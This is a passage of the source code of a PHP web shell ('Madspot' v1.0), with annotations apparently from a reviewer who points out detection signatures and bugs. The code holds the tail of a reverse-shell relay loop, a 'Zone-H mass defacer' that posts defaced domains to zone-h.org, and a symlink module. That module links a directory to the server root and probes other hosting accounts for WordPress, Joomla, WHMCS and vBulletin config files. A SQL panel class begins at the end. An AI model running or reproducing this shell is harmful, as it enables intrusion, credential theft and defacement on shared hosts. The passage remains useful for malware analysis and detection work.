1172 
1173     @stream_set_blocking($pipes[0], 0);
1174     @stream_set_blocking($pipes[1], 0);
1175     @stream_set_blocking($pipes[2], 0);
1176     @stream_set_blocking($sock, 0);
1177 
1178     echo "Successfully opened reverse shell to $ip:$port<br>";
1179 
         // Relay loop: socket -> shell stdin; shell stdout/stderr -> socket. Ends when
         // either side hits EOF.
1180     while (1) {
1181             if (feof($sock)) {
1182                     echo "ERROR: Shell connection terminated<br>";
1183                     break;
1184             }
1185 
1186             if (feof($pipes[1])) {
1187                     echo "ERROR: Shell process terminated<br>";
1188                     break;
1189             }
1190 
1191 
1192             $read_a = array($sock, $pipes[1], $pipes[2]);
1193             $num_changed_sockets=@stream_select($read_a, $write_a, $error_a, null);
1194 
1195             if (in_array($sock, $read_a)) {
1196                     if ($debug) echo "SOCK READ<br>";
1197                     $input=fread($sock, $chunk_size);
1198                     if ($debug) echo "SOCK: $input<br>";
1199                     fwrite($pipes[0], $input);
1200             }
1201 
1202             if (in_array($pipes[1], $read_a)) {
1203                     if ($debug) echo "STDOUT READ<br>";
1204                     $input = fread($pipes[1], $chunk_size);
1205                     if ($debug) echo "STDOUT: $input<br>";
1206                     fwrite($sock, $input);
1207             }
1208 
1209 
1210             if (in_array($pipes[2], $read_a)) {
1211                     if ($debug) echo "STDERR READ<br>";
1212                     $input = fread($pipes[2], $chunk_size);
1213                     if ($debug) echo "STDERR: $input<br>";
1214                     fwrite($sock, $input);
1215             }
1216     }
1217 
1218     fclose($sock);
1219     fclose($pipes[0]);
1220     fclose($pipes[1]);
1221     fclose($pipes[2]);
1222     proc_close($process);
1223 
1224     echo "</pre>";
1225     }
1226 
1227     }  
1228      echo "</div>";
1229      madfooter();
1230     }
1231     function ZoneH($url, $hacker, $hackmode,$reson, $site )
1232     {
                 // POST a defacement notification to $url with the fields
                 // defacer/domain1/hackmode/reason. The values are concatenated without
                 // urlencode(), redirects are followed, and the response body is returned
                 // (false if curl_exec() fails). Called from madzoneh().
1233             $k = curl_init();
1234             curl_setopt($k, CURLOPT_URL, $url);
1235             curl_setopt($k,CURLOPT_POST,true);
1236             curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
1237             curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
1238             curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
1239             $kubra = curl_exec($k);
1240             curl_close($k);
1241             return $kubra;
1242     }
1243     function madzoneh()
1244     {
             // Zone-H mass notifier: posts each line of $_POST['p3'] as a defaced domain
             // to zone-h.org, with notifier name p1 and hack-mode p2.
1245         madhead();
             // The cURL check only prints a message; it does not stop the function, so
             // the loop below still runs and ZoneH() would hit an undefined curl_init().
1246         if(!function_exists('curl_version'))
1247         {
1248             echo "<pre class=ml1 style='margin-top:5px'><center><font color=red>PHP CURL NOT EXIT</font></center></pre>";
1249         }
1250         echo "<div class=header><center><br>";
             // Form. The second <select> (reason) has no name attribute, so its value is
             // never submitted; $neden below is hard-coded to "Not available" instead.
1251         echo '<h3><span>|ZONE-H MASS DEFACER |</span></h3>
1252        <form  onSubmit="g(null,null,this.defacer.value,this.hackmode.value,this.domain.value);return false;" >
1253        <span>| Notifier |</span><br>
1254     <input type="text" name=defacer size="40" value="Attacker" /><br>
1255     <select name=hackmode>
1256     <option >--------SELECT--------</option>
1257     <option value="1">known vulnerability (i.e. unpatched system)</option>
1258     <option value="2" >undisclosed (new) vulnerability</option>
1259     <option value="3" >configuration / admin. mistake</option>
1260     <option value="4" >brute force attack</option>
1261     <option value="5" >social engineering</option>
1262     <option value="6" >Web Server intrusion</option>
1263     <option value="7" >Web Server external module intrusion</option>
1264     <option value="8" >Mail Server intrusion</option>
1265     <option value="9" >FTP Server intrusion</option>
1266     <option value="10" >SSH Server intrusion</option>
1267     <option value="11" >Telnet Server intrusion</option>
1268     <option value="12" >RPC Server intrusion</option>
1269     <option value="13" >Shares misconfiguration</option>
1270     <option value="14" >Other Server intrusion</option>
1271     <option value="15" >SQL Injection</option>
1272     <option value="16" >URL Poisoning</option>
1273     <option value="17" >File Inclusion</option>
1274     <option value="18" >Other Web Application bug</option>
1275     <option value="19" >Remote administrative panel access bruteforcing</option>
1276     <option value="20" >Remote administrative panel access password guessing</option>
1277     <option value="21" >Remote administrative panel access social engineering</option>
1278     <option value="22" >Attack against administrator(password stealing/sniffing)</option>
1279     <option value="23" >Access credentials through Man In the Middle attack</option>
1280     <option value="24" >Remote service password guessing</option>
1281     <option value="25" >Remote service password bruteforce</option>
1282     <option value="26" >Rerouting after attacking the Firewall</option>
1283     <option value="27" >Rerouting after attacking the Router</option>
1284     <option value="28" >DNS attack through social engineering</option>
1285     <option value="29" >DNS attack through cache poisoning</option>
1286     <option value="30" >Not available</option>
1287     </select><br>
1288     <select  >
1289     <option >Not available</option>
1290     <option value="1" >Heh...just for fun!</option>
1291     <option value="2" >Revenge against that website</option>
1292     <option value="3" >Political reasons</option>
1293     <option value="4" >As a challenge</option>
1294     <option value="5" >I just want to be the best defacer</option>
1295     <option value="6" >Patriotism</option>
1296     <option value="7" >Not available</option>
1297     </select><br>
1298     <textarea name=domain cols="50" rows="15">List Of Domains</textarea>
1299     <br>
1300     <input type="submit" value=">>" /></form>';
1301     if(isset($_POST['p1']) && isset($_POST['p2']))
1302     {
1303         $hacker =$_POST['p1'];
1304         $method =$_POST['p2'];
1305         $neden ="Not available";
1306         $site =$_POST['p3'];
1307        $i = 0;
         // Domains are split on "\n" only; if the textarea submits CRLF line endings,
         // the trailing "\r" stays attached to each domain.
1308        $sites = explode("\n", $site);
1309        echo "<pre class=ml1 style='margin-top:5px'>";
             // "Defaced !" is printed for every line regardless of what ZoneH() returned.
1310             while($i < count($sites))
1311             {
1312             if(substr($sites[$i], 0, 4) != "http")
1313             {
1314                             $sites[$i] = "http://".$sites[$i];
1315             }
1316             ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
1317             echo "Site : ".$sites[$i]." Defaced !<br>";
1318             ++$i;
1319             }
1320 
         // Bare expression statement, not an echo: this string is never output, and the
         // </pre> inside it is therefore never emitted.
1321         "Sending Sites To Zone-H Has Been Completed Successfully !! </pre>";
1322     }
1323     echo "</div>";
1324     madfooter();
1325 
1326     }
1327     function madspot()
1328     {
             // "About" screen of the shell: prints a fixed banner (ASCII art, author
             // credits and the madspot.net contact URL) between the shared page
             // header and footer. Reads no request input and has no side effect
             // beyond the output; madhead() / madfooter() are defined elsewhere in
             // this file.
             //
             // NOTE(review): the banner text is a constant string literal, so
             // fragments such as "Coded By: Ikram Ali", "Madspot Digital Security
             // Team" and "http://www.madspot.net" are usable as static signatures
             // (YARA / WAF) for this particular shell.
             //
             // NOTE(review): the two <img ... class="wp-smiley"> tags inside the
             // string are an artifact of the blog page this listing was scraped
             // from (WordPress turned ":|" into a smiley image -- see alt=":|");
             // the original file presumably contained the literal ":|" at both
             // places. They are left untouched here because the string is code.
1329         madhead();
1330         echo "<div class=header>";
1331         echo "<pre>
1332 
1333                               |`-:_
1334      ,----....____            |    `+.
1335     (             ````----....|___   |
1336      \     _                      ````----....____
1337       \    _)  Coded By: Ikram Ali                ```---.._
1338        \                                                   \
1339      )`.\  )`.   )`.   )`.   )`.   )`.   )`.   )`.   )`.   )`.   )hh
1340     -'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `
1341       Madspot is a Team of professional Ethical Hackers From Pakistan.
1342       We have Years of  Experience in  Security, Penetration & Coding
1343       And can Break and Secure.
1344 
1345       Version 1.0
1346 
1347       Contact : http://www.madspot.net
1348 
1349       if you found bug contact our team
1350 
1351 
1352 
1353 
1354                  .=''=.
1355                 / _  _ \
1356                |  d  b  |
1357                \   /\   /
1358               ,/'-=\/=-'\,
1359              / /        \ \     -----------------------------
1360             | / Zahid    \ |    Madspot Digital Security Team
1361             \/ \ Rasheed/ \/    -----------------------------
1362                 '.    .'
1363                 _|`~~`|_
1364                 /|\  /|\
1365 
1366           .- <O> -.        .-====-.      ,-------.      .-=<>=-.
1367       /_-\'''/-_\      / / '' \ \     |,-----.|     /__----__\
1368      |/  o) (o  \|    | | ')(' | |   /,'-----'.\   |/ (')(') \|
1369       \   ._.   /      \ \    / /   {_/(') (')\_}   \   __   /
1370       ,>-_,,,_-<.       >'=jf='<     `.   _   .'    ,'--__--'.
1371     / Waqar.Khan  \    /        \     /'-___-'\    /    <img src="/wp-includes/images/smilies/icon_neutral.gif" alt=":|" class="wp-smiley" />    \
1372     (_)     .     (_)  /  Ikram   \   / M-Usman \  (_)   <img src="/wp-includes/images/smilies/icon_neutral.gif" alt=":|" class="wp-smiley" />   (_)
1373     \_-----'____--/  (_)  Ali   (_) (_)_______(_)   |___:|____|
1374      \___________/     |________|     \_______/     | Afrasiab|
1375 
1376 
1377 
1378 
1379 
1380        </pre></div>";
1381         madfooter();
1382 
1383         }
1384 
1385     function madsymlink()
1386     {
         // Symlink-abuse module of the shell (menu entries "Domains", "Whole Server
         // Symlink", "Config PHP symlink"). The mode is selected by which of
         // $_POST['p1'] / ['p2'] / ['p3'] is set -- see the onclick handlers in
         // the menu below; g() is defined elsewhere in this file.
         //
         // All three modes enumerate the other accounts of a shared host by
         // reading /etc/named.conf and resolving the owner of
         // /etc/valiases/<domain>. The last two modes additionally create a
         // world-writable "sym/" directory beside the shell holding an .htaccess
         // and a symlink "root" -> "/".
         //
         // NOTE(review): on-disk artifacts of this module -- a directory "sym"
         // next to the shell containing ".htaccess" and a symlink named "root"
         // that points at "/" -- and access-log requests for paths containing
         // "/sym/root/home/" are direct indicators that it has been run.
         //
         // NOTE(review): every branch uses eregi(), which was deprecated in PHP
         // 5.3 and removed in 7.0, so this module does not run on PHP >= 7. The
         // variable names are obfuscated with I / l / 1 look-alikes; the comments
         // below name what each one holds.
1387         madhead();
1388 
         // $IIIIIIIIIIIl: URL of the directory the shell lives in. The scheme is
         // hard-coded to http://, the host is $_SERVER['SERVER_NAME'], and the
         // last path component of REQUEST_URI (the script name) is stripped with
         // str_replace. Only the "config" mode uses it, to send HTTP probes back
         // to this same server.
         // NOTE(review): str_replace removes every occurrence of that last
         // segment, not just the trailing one, so a URI that repeats the segment
         // yields a wrong base URL; harmless for the usual ".../shell.php" case.
1389     $IIIIIIIIIIIl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1390     $IIIIIIIIIII1=explode('/',$IIIIIIIIIIIl );
1391     $IIIIIIIIIIIl =str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1)-1],'',$IIIIIIIIIIIl );  
1392 
1393 
1394 
1395 
1396        echo '<div class=header><script>p1_=p2_=p3_="";</script><br><center><h3><a href=# onclick="g(\'symlink\',null,\'website\',null)">| Domains | </a><a href=# onclick="g(\'symlink\',null,null,\'whole\')">| Whole Server Symlink | </a><a href=# onclick="g(\'symlink\',null,null,null,\'config\')">| Config PHP symlink | </a></h3></center>';
1397 
         // ---- Mode 1, "Domains": domain -> account-owner table -------------------
         // Read-only: nothing is written to disk in this mode.
1398         if(isset($_POST['p1']) && $_POST['p1']=='website')
1399         {
1400             echo "<center>";
1401             $d0mains = @file("/etc/named.conf");
1402             if(!$d0mains){ echo "<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; }
1403 
1404 
1405 
1406     echo "<table align=center class='main'  border=0  >
1407 
1408     <tr bgcolor=Red><td>Count</td><td>domains</td><td>users</td></tr>";
1409     $count=1;
         // NOTE(review): when the file could not be read, $d0mains is false and
         // this foreach emits a warning (not fatal); the empty table is still
         // printed after the error message above.
1410     foreach($d0mains as $d0main){
1411 
         // Cheap case-insensitive pre-filter on lines containing "zone".
1412     if(@eregi("zone",$d0main)){
1413 
         // Extract the quoted zone name. NOTE(review): the greedy ".*" captures
         // up to the LAST double quote on the line, so this only yields a clean
         // domain when the zone name is the sole quoted token on that line.
         // $domains[1][0] is unset when the line has no `zone "..."` token; it
         // then trims to "" and fails the length check below.
1414     preg_match_all('#zone "(.*)"#', $d0main, $domains);
1415 
1416     flush();
1417 
1418     if(strlen(trim($domains[1][0])) > 2){
1419 
         // Owner of /etc/valiases/<domain> (per-domain file layout of cPanel-style
         // hosts, presumably) resolved to a passwd entry; ['name'] is the local
         // account that owns the domain, i.e. the /home/<user> reachable through
         // the symlink in the other two modes.
1420     $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1421 
1422     echo "<tr><td>".$count."</td><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();
1423     $count++;
1424     }}}
1425     echo "</center></table>";
1426      }
1427 
         // ---- Mode 2, "Whole Server Symlink" -------------------------------------
         // Creates sym/.htaccess and sym/root -> /, then prints, per zone, a link
         // to sym/root/home/<user>/public_html so other accounts' document roots
         // can be browsed through this account's virtual host.
1428      if(isset($_POST['p2']) && $_POST['p2']=='whole')
1429      {
1430 
1431 
1432         @set_time_limit(0);
1433 
1434         echo "<center>";
1435 
1436 
1437 
         // "sym" is created world-writable (0777). The .htaccess written into it:
         //   Options all                  -> includes FollowSymLinks, needed for
         //                                   Apache to follow sym/root
         //   AddType text/plain .php/.html
         //   AddHandler server-parsed .php -> intended to make PHP/HTML files under
         //   AddHandler txt .html             the link be delivered as plain text
         //                                   (source disclosure) instead of executed
         //   Require None / Satisfy Any   -> relax inherited access control
         // Whether Apache honours any of this depends on AllowOverride for the
         // directory; the code does not check.
1438     @mkdir('sym',0777);
1439     $IIIIIIIIIIl1  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1440     $IIIIIIIIII1I =@fopen ('sym/.htaccess','w');
1441     fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1);
1442     @symlink('/','sym/root');
         // NOTE(review): basename('_FILE_') operates on the literal string
         // '_FILE_' (not the __FILE__ constant) and the result is never used --
         // dead code.
1443     $IIIIIIIIIlIl = basename('_FILE_');
1444 
1445 
         // $IIIIIIIIIllI: lines of /etc/named.conf, or false if unreadable.
1446     $IIIIIIIIIllI = @file('/etc/named.conf');
1447     if(!$IIIIIIIIIllI)
1448     {
1449     echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
1450     }
1451     else
1452     {
1453     echo "<table align='center' width='40%' class='main'><td>Domains</td><td>Users</td><td>symlink </td>";
         // Same zone-extraction loop as mode 1 (same greedy-regex caveat).
         // $IIIIIIIIIll1 = current line, $IIIIIIIIIl11 = preg_match_all captures,
         // $IIIIIIIII1I1 = passwd entry of the /etc/valiases/<domain> owner.
1454     foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
1455     if(@eregi('zone',$IIIIIIIIIll1)){
1456     preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
1457     flush();
1458     if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
1459     $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
         // NOTE(review): this assignment is a dead store -- $IIIIIIII1I1l is
         // overwritten with the domain name two lines below.
1460     $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
         // Redundant: the same symlink was already created above the loop.
1461     @symlink('/','sym/root');
         // $IIIIIIII1I1l: display text for the domain cell; domains whose name
         // contains ".ir" or ".il" are rendered in red. The eregi patterns are
         // unanchored, so any occurrence matches (e.g. "x.ireland.example").
1462     $IIIIIIII1I1l = $IIIIIIIIIl11[1][0];
1463     $IIIIIIII1I11 = '\.ir';
1464     $IIIIIIII1lII = '\.il';
1465     if (@eregi("$IIIIIIII1I11",$IIIIIIIIIl11[1][0]) or @eregi("$IIIIIIII1lII",$IIIIIIIIIl11[1][0]) )
1466     {
1467     $IIIIIIII1I1l = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$IIIIIIIIIl11[1][0].'</div>';
1468     }
         // Row: domain link, owning account, and a relative link into the other
         // account's public_html via the sym/root symlink.
1469     echo "
1470     <tr>
1471 
1472     <td>
1473     <a target='_blank' href=http://www.".$IIIIIIIIIl11[1][0].'/>'.$IIIIIIII1I1l.' </a>
1474     </td>
1475 
1476     <td>
1477     '.$IIIIIIIII1I1['name']."
1478     </td>
1479 
1480     <td>
1481     <a href='sym/root/home/".$IIIIIIIII1I1['name']."/public_html' target='_blank'>symlink </a>
1482     </td>
1483 
1484 
1485     </tr>";
1486     flush();
1487     }
1488     }
1489     }
1490     }
1491 
1492     echo "</center></table>";
1493 
1494      }
1495 
1496 
1497 
         // ---- Mode 3, "Config PHP symlink" ---------------------------------------
         // Same sym/ setup as mode 2, then for each account the server requests
         // ITS OWN URL <shell dir>/sym/root/home/<user>/public_html/<path> for a
         // fixed list of CMS configuration files (WordPress, Joomla, WHMCS,
         // vBulletin) and links the first one that answers HTTP 200.
         //
         // NOTE(review): each account produces up to 13 get_headers() requests
         // to this host for paths under "/sym/root/home/" -- presumably logged
         // from the server's own address -- which makes this mode noisy and easy
         // to spot in the web access log.
1498      if(isset($_POST['p3']) && $_POST['p3']=='config')
1499 
1500 
1501      {
1502       echo "<center>";
         // Identical directory / .htaccess / symlink setup as in mode 2 (see the
         // directive-by-directive comment there). The only difference is that
         // fwrite() is @-silenced here.
1503     @mkdir('sym',0777);
1504     $IIIIIIIIIIl1  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1505     $IIIIIIIIII1I =@fopen ('sym/.htaccess','w');
1506     @fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1);
1507     @symlink('/','sym/root');
         // Dead code, as in mode 2 (literal '_FILE_', result unused).
1508     $IIIIIIIIIlIl = basename('_FILE_');
1509 
1510 
1511        $IIIIIIIIIllI = @file('/etc/named.conf');
1512     if(!$IIIIIIIIIllI)
1513     {
1514     echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
1515     }
1516     else
1517     {
1518     echo "
1519     <table align='center' width='40%' class='main' ><td> Domains </td><td> Script </td>";
1520     foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
1521     if(@eregi('zone',$IIIIIIIIIll1)){
1522     preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
1523     flush();
1524     if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
1525     $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
         // Probe list. Each pair of lines builds a URL under the shell's own
         // directory ($IIIIIIIIIIIl) and fetches its response headers with
         // get_headers(); the second line keeps only element [0], the status
         // line (e.g. "HTTP/1.1 200 OK"), or null when get_headers() returned
         // false. Probed paths, in order: wp-config.php, blog/wp-config.php,
         // configuration.php, joomla/configuration.php, includes/config.php,
         // vb/includes/config.php, forum/includes/config.php,
         // clients/configuration.php, support/configuration.php,
         // client/configuration.php, submitticket.php, client/configuration.php
         // (again).
1526     $IIIIIIIII1l1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/wp-config.php';
1527     $IIIIIIIII11I=get_headers($IIIIIIIII1l1);
1528     $IIIIIIIII11l=$IIIIIIIII11I[0];
1529     $IIIIIIIII111=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/blog/wp-config.php';
1530     $IIIIIIIIlIII=get_headers($IIIIIIIII111);
1531     $IIIIIIIIlIIl=$IIIIIIIIlIII[0];
1532     $IIIIIIIIlII1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/configuration.php';
1533     $IIIIIIIIlIlI=get_headers($IIIIIIIIlII1);
1534     $IIIIIIIIlIll=$IIIIIIIIlIlI[0];
1535     $IIIIIIIIlIl1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/joomla/configuration.php';
1536     $IIIIIIIIlI1I=get_headers($IIIIIIIIlIl1);
1537     $IIIIIIIIlI1l=$IIIIIIIIlI1I[0];
1538     $IIIIIIIIlI11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/includes/config.php';
1539     $IIIIIIIIllII=get_headers($IIIIIIIIlI11);
1540     $IIIIIIIIllIl=$IIIIIIIIllII[0];
1541     $IIIIIIIIllI1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/vb/includes/config.php';
1542     $IIIIIIIIlllI=get_headers($IIIIIIIIllI1);
1543     $IIIIIIIIllll=$IIIIIIIIlllI[0];
1544     $IIIIIIIIlll1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/forum/includes/config.php';
1545     $IIIIIIIIll1I=get_headers($IIIIIIIIlll1);
1546     $IIIIIIIIll1l=$IIIIIIIIll1I[0];
         // NOTE(review): missing "/" before "public_html" -- this probe requests
         // /home/<user>public_html/clients/... and can never hit; its result
         // ($IIIIIIIIl1Il) is also never consulted by the classification below.
1547     $IIIIIIIIll11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'public_html/clients/configuration.php';
1548     $IIIIIIIIl1II=get_headers($IIIIIIIIll11);
1549     $IIIIIIIIl1Il=$IIIIIIIIl1II[0];
1550     $IIIIIIIIl1I1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/support/configuration.php';
1551     $IIIIIIIIl1II=get_headers($IIIIIIIIl1I1);
1552     $IIIIIIIIl1lI=$IIIIIIIIl1II[0];
1553     $IIIIIIIIl1ll=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
1554     $IIIIIIIIl1l1=get_headers($IIIIIIIIl1ll);
1555     $IIIIIIIIl11I=$IIIIIIIIl1l1[0];
1556     $IIIIIIIIl11l=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/submitticket.php';
1557     $IIIIIIIIl111=get_headers($IIIIIIIIl11l);
1558     $IIIIIIII1III=$IIIIIIIIl111[0];
         // NOTE(review): duplicate of the client/configuration.php probe three
         // lines up; $IIIIIIII1IlI is never read.
1559     $IIIIIIII1IIl=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
1560     $IIIIIIII1II1=get_headers($IIIIIIII1IIl);
1561     $IIIIIIII1IlI=$IIIIIIII1II1[0];
         // $IIIIIIII1Ill is computed but never used.
1562     $IIIIIIII1Ill = strpos($IIIIIIIII11l,'200');
         // Classification by status line. strpos(..., '200') is a substring test
         // on the status line and "== true" is a loose comparison against the
         // match offset (false/null when absent). Order matters: a hit on
         // configuration.php is reported as WHMCS only when submitticket.php
         // also answered 200, otherwise it falls through to the Joomla branch.
         // Accounts with no hit at all are skipped via continue.
1563     $IIIIIIII1I1I='&nbsp;';
1564     if (strpos($IIIIIIIII11l,'200') == true )
1565     {
1566     $IIIIIIII1I1I="<a href='".$IIIIIIIII1l1."' target='_blank'>Wordpress</a>";
1567     }
1568     elseif (strpos($IIIIIIIIlIIl,'200') == true)
1569     {
1570     $IIIIIIII1I1I="<a href='".$IIIIIIIII111."' target='_blank'>Wordpress</a>";
1571     }
1572     elseif (strpos($IIIIIIIIlIll,'200')  == true and strpos($IIIIIIII1III,'200')  == true )
1573     {
1574     $IIIIIIII1I1I=" <a href='".$IIIIIIIIl11l."' target='_blank'>WHMCS</a>";
1575     }
1576     elseif (strpos($IIIIIIIIl1lI,'200')  == true)
1577     {
1578     $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1I1."' target='_blank'>WHMCS</a>";
1579     }
1580     elseif (strpos($IIIIIIIIl11I,'200')  == true)
1581     {
1582     $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1ll."' target='_blank'>WHMCS</a>";
1583     }
1584     elseif (strpos($IIIIIIIIlIll,'200')  == true)
1585     {
1586     $IIIIIIII1I1I=" <a href='".$IIIIIIIIlII1."' target='_blank'>Joomla</a>";
1587     }
1588     elseif (strpos($IIIIIIIIlI1l,'200')  == true)
1589     {
1590     $IIIIIIII1I1I=" <a href='".$IIIIIIIIlIl1."' target='_blank'>Joomla</a>";
1591     }
1592     elseif (strpos($IIIIIIIIllIl,'200')  == true)
1593     {
1594     $IIIIIIII1I1I=" <a href='".$IIIIIIIIlI11."' target='_blank'>vBulletin</a>";
1595     }
1596     elseif (strpos($IIIIIIIIllll,'200')  == true)
1597     {
1598     $IIIIIIII1I1I=" <a href='".$IIIIIIIIllI1."' target='_blank'>vBulletin</a>";
1599     }
1600     elseif (strpos($IIIIIIIIll1l,'200')  == true)
1601     {
1602     $IIIIIIII1I1I=" <a href='".$IIIIIIIIlll1."' target='_blank'>vBulletin</a>";
1603     }
1604     else
1605     {
1606     continue;
1607     }
         // Dead store: $IIIIIIII1I1l is not referenced after this point.
1608     $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
1609     echo '<tr><td><a href=http://www.'.$IIIIIIIIIl11[1][0].'/>'.$IIIIIIIIIl11[1][0].'</a></td>
1610     <td>'.$IIIIIIII1I1I.'</td></tr>';flush();
1611     }
1612     }
1613     }
1614     }
1615     echo "</center></table>";  
1616 
1617      }
1618 
1619         echo "</div>";
1620         madfooter();
1621 
1622     }
1623 
1624 
1625     function madsql()
1626     {
1627 
1628 
1629         class DbClass {
                         /**
                          * Minimal database wrapper behind the shell's "Sql" panel: a
                          * switch over the legacy mysql_* and pg_* extensions, selected
                          * by $type ('mysql' | 'pgsql'). Host, credentials, database
                          * and statements are all supplied by the shell operator via
                          * POST (see the enclosing function), so nothing in this class
                          * is a trust boundary and the @-silencing hides every error.
                          *
                          * NOTE(review): the mysql_* extension was removed in PHP 7.0 and
                          * the PHP4-style constructor (function DbClass) in PHP 8.0, so
                          * this class is PHP 5 only. The scratch table name "wso2" in
                          * loadFile() suggests the code was lifted from the WSO shell.
                          */
1630                     var $type;
1631                     var $link;
1632                     var $res;
                         // PHP4-style constructor: only records the backend name.
1633                     function DbClass($type) {
1634                             $this->type = $type;
1635                     }
                         /**
                          * Open a connection and store it in $this->link.
                          * mysql: mysql_connect() with new_link=true; $dbname is ignored
                          *        (the database is chosen later by selectdb()).
                          * pgsql: $host is "host[:port]", port defaults to 5432; all
                          *        values are interpolated unescaped into the DSN.
                          * Returns true on success, false otherwise (and on unknown type).
                          */
1636                     function connect($host, $user, $pass, $dbname){
1637                             switch($this->type)     {
1638                                     case 'mysql':
1639                                             if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1640                                             break;
1641                                     case 'pgsql':
1642                                             $host = explode(':', $host);
1643                                             if(!$host[1]) $host[1]=5432;
1644                                             if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1645                                             break;
1646                             }
1647                             return false;
1648                     }
                         // Select the current database. mysql only; for pgsql the
                         // database is fixed at connect() time and this returns false.
1649                     function selectdb($db) {
1650                             switch($this->type)     {
1651                                     case 'mysql':
1652                                             if (@mysql_select_db($db))return true;
1653                                             break;
1654                             }
1655                             return false;
1656                     }
                         // Execute a raw statement. The result resource (or false on
                         // error, errors silenced) is both stored in $this->res and
                         // returned. No escaping: $str is passed through verbatim.
1657                     function query($str) {
1658                             switch($this->type) {
1659                                     case 'mysql':
1660                                             return $this->res = @mysql_query($str);
1661                                             break;
1662                                     case 'pgsql':
1663                                             return $this->res = @pg_query($this->link,$str);
1664                                             break;
1665                             }
1666                             return false;
1667                     }
                         // Fetch the next row as an associative array. Takes an optional
                         // result resource as its only argument (read via func_get_arg);
                         // without it, the result of the last query() is used.
1668                     function fetch() {
1669                             $res = func_num_args()?func_get_arg(0):$this->res;
1670                             switch($this->type)     {
1671                                     case 'mysql':
1672                                             return @mysql_fetch_assoc($res);
1673                                             break;
1674                                     case 'pgsql':
1675                                             return @pg_fetch_assoc($res);
1676                                             break;
1677                             }
1678                             return false;
1679                     }
                         // Run the backend's "list databases" query; rows are then read
                         // with fetch(). pgsql excludes template databases.
1680                     function listDbs() {
1681                             switch($this->type)     {
1682                                     case 'mysql':
1683                             return $this->query("SHOW databases");
1684                                     break;
1685                                     case 'pgsql':
1686                                             return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
1687                                     break;
1688                             }
1689                             return false;
1690                     }
                         // Run the backend's "list tables" query for the current
                         // database; pgsql hides information_schema and pg_catalog.
1691                     function listTables() {
1692                             switch($this->type)     {
1693                                     case 'mysql':
1694                                             return $this->res = $this->query('SHOW TABLES');
1695                                     break;
1696                                     case 'pgsql':
1697                                             return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
1698                                     break;
1699                             }
1700                             return false;
1701                     }
                         // Last error message of the backend (false for unknown type).
1702                     function error() {
1703                             switch($this->type)     {
1704                                     case 'mysql':
1705                                             return @mysql_error();
1706                                     break;
1707                                     case 'pgsql':
1708                                             return @pg_last_error();
1709                                     break;
1710                             }
1711                             return false;
1712                     }
                         // Set the connection character set. On mysql without
                         // mysql_set_charset() it falls back to a "SET CHARSET" query
                         // and then returns false regardless of outcome.
1713                     function setCharset($str) {
1714                             switch($this->type)     {
1715                                     case 'mysql':
1716                                             if(function_exists('mysql_set_charset'))
1717                                                     return @mysql_set_charset($str, $this->link);
1718                                             else
1719                                                     $this->query('SET CHARSET '.$str);
1720                                             break;
1721                                     case 'pgsql':
